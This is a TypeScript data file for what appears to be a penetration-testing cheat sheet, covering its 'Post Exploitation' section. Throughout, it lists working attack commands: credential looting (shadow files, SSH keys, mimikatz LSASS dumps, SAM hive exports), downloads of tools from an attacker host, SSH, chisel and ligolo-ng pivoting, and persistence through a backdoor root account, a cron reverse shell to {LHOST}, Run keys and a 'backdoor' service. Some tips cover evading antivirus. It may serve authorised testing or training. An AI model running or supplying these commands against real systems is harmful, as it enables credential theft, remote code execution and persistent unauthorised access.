import { Section } from "./types";

export const postSection: Section = {
  id: "post",
  title: "Post Exploitation",
  slug: "post",
  groups: [
    {
      title: "Linux Looting",
      subtitle: "Run immediately after getting a shell — collect credentials before the session is lost or killed.",
      commands: [
        { id: "loot-l-1", cmd: "cat ~/.bash_history && cat ~/.zsh_history 2>/dev/null", description: "Shell history often reveals credentials typed in plain text, SSH destinations, or sudo usage patterns.", tip: "Also check /root/.bash_history if you have privilege. History may be disabled — check HISTSIZE.", tags: ["linux"] },
        { id: "loot-l-2", cmd: "find / -name 'id_rsa' -o -name '*.pem' -o -name '*.kdbx' 2>/dev/null", description: "SSH private keys and KeePass databases — high value for lateral movement and privilege escalation.", tip: "Found key needs chmod 600 before use. Check if it's protected with a passphrase: ssh-keygen -y -f id_rsa", tags: ["linux"] },
        { id: "loot-l-3", cmd: "cat /etc/passwd && sudo cat /etc/shadow 2>/dev/null", description: "Extract password hashes for offline cracking — /etc/shadow requires root or sudo.", tip: "Crack with: hashcat -m 1800 shadow.txt rockyou.txt or john --wordlist=rockyou.txt shadow.txt", tags: ["linux"] },
        { id: "loot-l-4", cmd: "grep -r 'password\\|passwd\\|secret\\|token\\|api_key' /var/www /opt /home /etc 2>/dev/null", description: "Search service directories for hardcoded credentials — catches web app configs, deploy scripts, .env files.", tip: "Narrow down with: grep -r 'password' /var/www/html --include='*.php' 2>/dev/null", tags: ["linux"] },
        { id: "loot-l-5", cmd: "cat /var/www/html/wp-config.php /var/www/html/config.php 2>/dev/null", description: "Web app config files contain DB credentials — try them for MySQL access, SSH login, or sudo.", tags: ["linux", "web"] },
        { id: "loot-l-6", cmd: "find / -name '*.conf' -exec grep -l 'password' {} \\; 2>/dev/null", description: "Find service config files (nginx, apache, mysql, postgres) that contain stored passwords.", tags: ["linux"] },
        { id: "loot-l-7", cmd: "env | grep -iE 'pass|token|key|secret|api'", description: "Environment variables injected by web frameworks, containers, or deploy pipelines often contain secrets.", tags: ["linux"] },
        { id: "loot-l-8", cmd: "ls -la /root/.ssh && cat /root/.ssh/id_rsa 2>/dev/null", description: "Root's SSH key enables passwordless login to other boxes — grab before losing the session.", tags: ["linux"] },
        { id: "loot-l-9", cmd: "mysql -u root -p -e 'show databases;'", description: "List MySQL databases as root — useful when web app config reveals a password. Often reused.", tags: ["linux"] },
        { id: "loot-l-10", cmd: "ss -tlnp && netstat -rn", description: "Identify internal services and routing table — reveals pivot targets on internal networks.", tip: "Ports bound to 127.0.0.1 are only reachable locally — forward them with SSH -L for exploitation.", tags: ["linux"] },
      ],
    },
    {
      title: "Windows Looting",
      subtitle: "Collect credentials and recon immediately after initial access — cover all sources before AV triggers.",
      commands: [
        { id: "loot-w-1", cmd: "mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"", description: "Dump plaintext passwords and NTLM hashes from LSASS — run with admin privileges.", tip: "WDigest disabled by default since Win 8.1, but NTLM hashes are always present for PtH.", tags: ["windows"] },
        { id: "loot-w-2", cmd: "reg save HKLM\\SAM C:\\Windows\\Temp\\SAM && reg save HKLM\\SYSTEM C:\\Windows\\Temp\\SYSTEM && reg save HKLM\\SECURITY C:\\Windows\\Temp\\SECURITY", description: "Save registry hives for offline cracking — stealthier than touching LSASS. Transfer to attacker machine.", tip: "Then run: secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL", tags: ["windows"] },
        { id: "loot-w-3", cmd: "cmdkey /list", description: "List stored Windows credentials — can be used with 'runas /savecred' for lateral movement.", tip: "If admin creds are cached: runas /savecred /user:DOMAIN\\Administrator cmd", tags: ["windows"] },
        { id: "loot-w-4", cmd: "vaultcmd /list && vaultcmd /listschema", description: "Windows Credential Vault may store RDP, browser, and network share passwords.", tags: ["windows"] },
        { id: "loot-w-5", cmd: "dir /s /b *pass* *cred* *vnc* *.kdbx *secret* 2>nul", description: "Find files named after credentials — KeePass databases, VNC password files, or config dumps.", tags: ["windows"] },
        { id: "loot-w-6", cmd: "reg query HKCU\\Software\\RealVNC\\WinVNC4 /v password 2>nul", description: "VNC stores an obfuscated password in the registry — decode with msfconsole or vncpasswd.", tip: "Also check TightVNC: HKCU\\Software\\TightVNC\\Server /v Password", tags: ["windows"] },
        { id: "loot-w-7", cmd: "type %USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", description: "PowerShell command history — contains recent commands including passwords typed as arguments.", tags: ["windows"] },
        { id: "loot-w-8", cmd: "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultPassword", description: "Autologon credentials stored in plaintext — often set on kiosk or single-user machines.", tags: ["windows"] },
        { id: "loot-w-9", cmd: "findstr /si password *.xml *.ini *.txt *.config 2>nul", description: "Search current directory tree for the string 'password' in common config file types.", tags: ["windows"] },
        { id: "loot-w-10", cmd: "ipconfig /all && arp -a && route print", description: "Network recon — identify additional interfaces, internal subnets, and recently contacted hosts for pivoting.", tags: ["windows"] },
      ],
    },
    {
      title: "Meterpreter Post",
      subtitle: "Key Meterpreter commands for credential collection and session management after initial access.",
      commands: [
        { id: "post-1", cmd: "getuid", description: "Confirm current session identity — verify if already SYSTEM or if privilege escalation is needed.", tags: ["all"] },
        { id: "post-2", cmd: "hashdump", description: "Dump local SAM hashes — use for pass-the-hash or offline cracking with hashcat -m 1000.", tip: "Requires SYSTEM-level access. If it fails, try: getsystem first.", tags: ["windows"] },
        { id: "post-2a", cmd: "sysinfo", description: "Get target OS, hostname, and architecture — use to select correct payload/exploit architecture.", tags: ["all"] },
        { id: "post-2b", cmd: "ps && migrate {PID}", description: "Migrate to a stable process like explorer.exe or svchost.exe to survive user logoff.", tip: "Migrate to a 64-bit process if your session is 32-bit for better tool compatibility.", tags: ["all"], hasVars: true },
        { id: "post-2c", cmd: "run post/multi/recon/local_exploit_suggester", description: "Automated local exploit suggestions based on system info — surfaces quick privesc paths.", tags: ["all"] },
        { id: "post-2d", cmd: "load kiwi && creds_all", description: "Load Kiwi (Meterpreter's mimikatz) and dump all available credentials in one command.", tip: "creds_all covers logonpasswords, sam, lsa, and wdigest in one shot.", tags: ["windows"] },
      ],
    },
    {
      title: "File Transfer Linux",
      subtitle: "Use when you need to move tools or exfiltrate loot — pick the method based on what's available on target.",
      commands: [
        { id: "post-3", cmd: "python3 -m http.server 8000", description: "Host files from your attacker machine for target to download — run from tool directory.", tip: "Check if python3 is available first. Fallback: python -m SimpleHTTPServer 8000", tags: ["linux"] },
        { id: "post-4", cmd: "wget http://{LHOST}:{LPORT}/file -O /tmp/file", description: "Download a file from your attacker HTTP server — most Linux systems have wget.", tags: ["linux"], hasVars: true },
        { id: "post-4a", cmd: "curl http://{LHOST}:{LPORT}/file -o /tmp/file", description: "curl alternative for downloading tools — use when wget isn't available.", tags: ["linux"], hasVars: true },
        { id: "post-4b", cmd: "scp {USER}@{RHOST}:/remote/file /local/path", description: "Secure copy over SSH — use when you have SSH access and need to transfer cleanly.", tags: ["linux"], hasVars: true },
        { id: "post-4c", cmd: "cat file | base64 -w0 && echo", description: "Base64-encode a file for copy-paste transfer — useful when no HTTP or network tools are available.", tip: "Decode on attacker: echo 'BASE64' | base64 -d > file", tags: ["linux"] },
        { id: "post-4d", cmd: "echo 'BASE64DATA' | base64 -d > /tmp/file", description: "Decode a base64-transferred file on the target — the reverse of the base64 encode step.", tags: ["linux"] },
      ],
    },
    {
      title: "File Transfer Windows",
      subtitle: "Use when moving tools to a Windows target — certutil and PowerShell WebClient are most reliable.",
      commands: [
        { id: "post-5", cmd: "certutil -urlcache -f http://{LHOST}/nc.exe nc.exe", description: "Download with certutil — built into all Windows versions. Often missed by AV.", tip: "Use -f to force re-download if file already exists. AV may flag certutil downloads.", tags: ["windows"], hasVars: true },
        { id: "post-6", cmd: "powershell -c \"(New-Object Net.WebClient).DownloadFile('http://{LHOST}/tool.exe','C:\\Windows\\Temp\\tool.exe')\"", description: "PowerShell WebClient download — reliable and available on all modern Windows systems.", tip: "Add -ep bypass if PowerShell execution policy blocks the command.", tags: ["windows"], hasVars: true },
        { id: "post-6a", cmd: "bitsadmin /transfer n /download /priority normal http://{LHOST}/tool.exe C:\\Windows\\Temp\\tool.exe", description: "BITS download — survives reboots and user logoff. Good for persistence scenarios.", tags: ["windows"], hasVars: true },
        { id: "post-6b", cmd: "iwr http://{LHOST}/tool.exe -OutFile C:\\Windows\\Temp\\tool.exe", description: "PowerShell Invoke-WebRequest — more modern than WebClient, supports HTTPS natively.", tags: ["windows"], hasVars: true },
        { id: "post-6c", cmd: "impacket-smbserver share . -smb2support", description: "Host an SMB share on attacker machine — Windows targets can access it without installing anything.", tip: "Run from the directory containing your tools. Add -username/-password for auth.", tags: ["linux"] },
        { id: "post-6d", cmd: "copy \\\\{LHOST}\\share\\nc.exe C:\\Windows\\Temp\\nc.exe", description: "Pull a file from your Impacket SMB share — no PowerShell needed, works from cmd.exe.", tags: ["windows"], hasVars: true },
        { id: "post-6e", cmd: "[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\\file.exe')) | clip", description: "Base64-encode a file to clipboard for manual copy-paste transfer — no network needed.", tags: ["windows"] },
      ],
    },
    {
      title: "Pivoting & Tunneling",
      subtitle: "Use when you need to reach internal network segments not directly accessible from your attacker machine.",
      commands: [
        { id: "post-7", cmd: "ssh -L {LPORT}:127.0.0.1:{RPORT} {USER}@{RHOST}", description: "Local port forward — make a remote service accessible locally. E.g., forward RDP 3389 to localhost:33389.", tip: "Use after confirming with netstat that the service is only bound to 127.0.0.1 on target.", tags: ["linux"], hasVars: true },
        { id: "post-7a", cmd: "ssh -R {RPORT}:127.0.0.1:{LPORT} {USER}@{LHOST}", description: "Reverse port forward — expose a local service on the remote machine. Useful for reverse shells through firewalls.", tags: ["linux"], hasVars: true },
        { id: "post-7b", cmd: "ssh -D 9050 -N {USER}@{RHOST}", description: "SOCKS5 dynamic proxy through SSH — routes all proxychains traffic through the pivot host.", tip: "Pair with: proxychains nmap -sT -Pn -p- {INTERNAL_HOST}", tags: ["linux"], hasVars: true },
        { id: "post-8", cmd: "chisel server -p 8000 --reverse", description: "Start Chisel server on attacker — listens for reverse connections from pivot hosts.", tip: "Use when SSH isn't available. Chisel works over HTTP and is hard to block.", tags: ["all"] },
        { id: "post-8a", cmd: "chisel client {LHOST}:8000 R:socks", description: "Chisel client on pivot — creates reverse SOCKS5 proxy back to attacker machine.", tags: ["all"], hasVars: true },
        { id: "post-8b", cmd: "chisel client {LHOST}:8000 R:{RPORT}:{RHOST}:{RPORT}", description: "Chisel — forward a specific internal port (e.g., SMB 445) back to your attacker machine.", tags: ["all"], hasVars: true },
        { id: "post-9", cmd: "ligolo-ng proxy -selfcert -laddr 0.0.0.0:11601", description: "Ligolo-ng proxy on attacker — best tool for multi-hop pivoting with full subnet routing.", tip: "Preferred over chisel/proxychains for complex internal networks — routes entire subnets natively.", tags: ["all"] },
        { id: "post-9a", cmd: "ligolo-ng agent -connect {LHOST}:11601 -ignore-cert", description: "Ligolo-ng agent on pivot host — connects back to attacker and establishes the tunnel.", tags: ["all"], hasVars: true },
        { id: "post-9b", cmd: "sudo ip tuntap add user $(whoami) mode tun ligolo && sudo ip link set ligolo up && sudo ip route add 192.168.0.0/24 dev ligolo", description: "Step 1 of Ligolo setup — create tunnel interface and add route for the target internal subnet.", tip: "Run 'session' in Ligolo console to select the agent, then 'start' to activate routing.", tags: ["linux"] },
        { id: "post-9c", cmd: "listener_add --addr 0.0.0.0:1080 --to 127.0.0.1:1080 --tcp", description: "Ligolo-ng double pivot — add a listener on pivot host 1 that forwards to attacker. Run in Ligolo console.", tip: "After this, deploy agent2 on pivot host 2 with: agent -connect {PIVOT1_IP}:1080 -ignore-cert", tags: ["all"] },
        { id: "post-9d", cmd: "sudo ip tuntap add user $(whoami) mode tun ligolo2 && sudo ip link set ligolo2 up && sudo ip route add 172.16.0.0/24 dev ligolo2", description: "Double pivot step 2 — create a second tunnel interface for the deeper internal subnet.", tip: "In Ligolo console: session (select agent2) → start --tun ligolo2. Now 172.16.0.0/24 is directly routable.", tags: ["linux"] },
        { id: "post-10", cmd: "proxychains nmap -sT -Pn -p 80,443,445,3389,22 {RHOST}", description: "Scan internal hosts through a SOCKS proxy — use with SSH -D or Chisel SOCKS tunnel.", tip: "-sT (TCP connect) is required through proxychains — SYN scan (-sS) won't work.", tags: ["all"], hasVars: true },
        { id: "post-10a", cmd: "sshuttle -r {USER}@{RHOST} 10.10.0.0/16 --ssh-cmd 'ssh -i id_rsa'", description: "Transparent VPN-style tunnel via SSH — routes an entire subnet through the pivot without proxychains.", tags: ["linux"], hasVars: true },
        { id: "post-10b", cmd: "socat TCP-LISTEN:9001,fork TCP:{RHOST}:{RPORT}", description: "Socat TCP relay — simple port forward when SSH isn't available. Stays in foreground.", tags: ["all"], hasVars: true },
        { id: "post-10c", cmd: "plink.exe -ssh -l {USER} -pw {PASS} -R 445:127.0.0.1:445 {LHOST}", description: "Windows reverse tunnel with plink — forward an internal Windows service (e.g., SMB) to attacker.", tags: ["windows"], hasVars: true },
        { id: "post-10d", cmd: "meterpreter > autoroute -s {RHOST}/24", description: "Add a route through an active Meterpreter session — allows other MSF modules to reach internal subnet.", tags: ["all"], hasVars: true },
        { id: "post-10e", cmd: "meterpreter > portfwd add -l {LPORT} -p {RPORT} -r {RHOST}", description: "Meterpreter local port forward — makes an internal service available on attacker's localhost.", tags: ["all"], hasVars: true },
      ],
    },
    {
      title: "Persistence Quick Ops",
      subtitle: "Use when you need to maintain access — set up before escalating in case the original shell is lost.",
      commands: [
        { id: "post-11", cmd: "echo '{USER}:$(openssl passwd -6 P@ssw0rd):0:0:root:/root:/bin/bash' | sudo tee -a /etc/passwd", description: "Add backdoor root account to /etc/passwd — works when you have sudo or root, and file is writable.", tip: "Modern systems may use shadow passwords — verify the format works by checking existing entries.", tags: ["linux"], hasVars: true },
        { id: "post-11a", cmd: "(crontab -l 2>/dev/null; echo '* * * * * bash -c \"bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1\"') | crontab -", description: "Add a cron reverse shell for the current user — fires every minute. Start listener before adding.", tags: ["linux"], hasVars: true },
        { id: "post-11b", cmd: "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v updater /t REG_SZ /d \"C:\\Windows\\Temp\\updater.exe\" /f", description: "Registry Run key persistence for current user — payload executes on next login.", tip: "Use HKLM for system-wide persistence (requires admin). HKCU only needs current user perms.", tags: ["windows"] },
        { id: "post-11c", cmd: "schtasks /create /tn Updater /tr \"C:\\Windows\\Temp\\updater.exe\" /sc onlogon /ru SYSTEM /f", description: "Scheduled task persistence as SYSTEM — survives reboots, runs as the highest privilege account.", tags: ["windows"] },
        { id: "post-11d", cmd: "sc create backdoor binPath= \"cmd /c start C:\\Windows\\Temp\\shell.exe\" start= auto", description: "Create an auto-starting service — runs as SYSTEM on boot. Note the space after binPath= and start=.", tip: "The space after = is required by sc.exe syntax. Don't remove it.", tags: ["windows"] },
      ],
    },
  ],
};
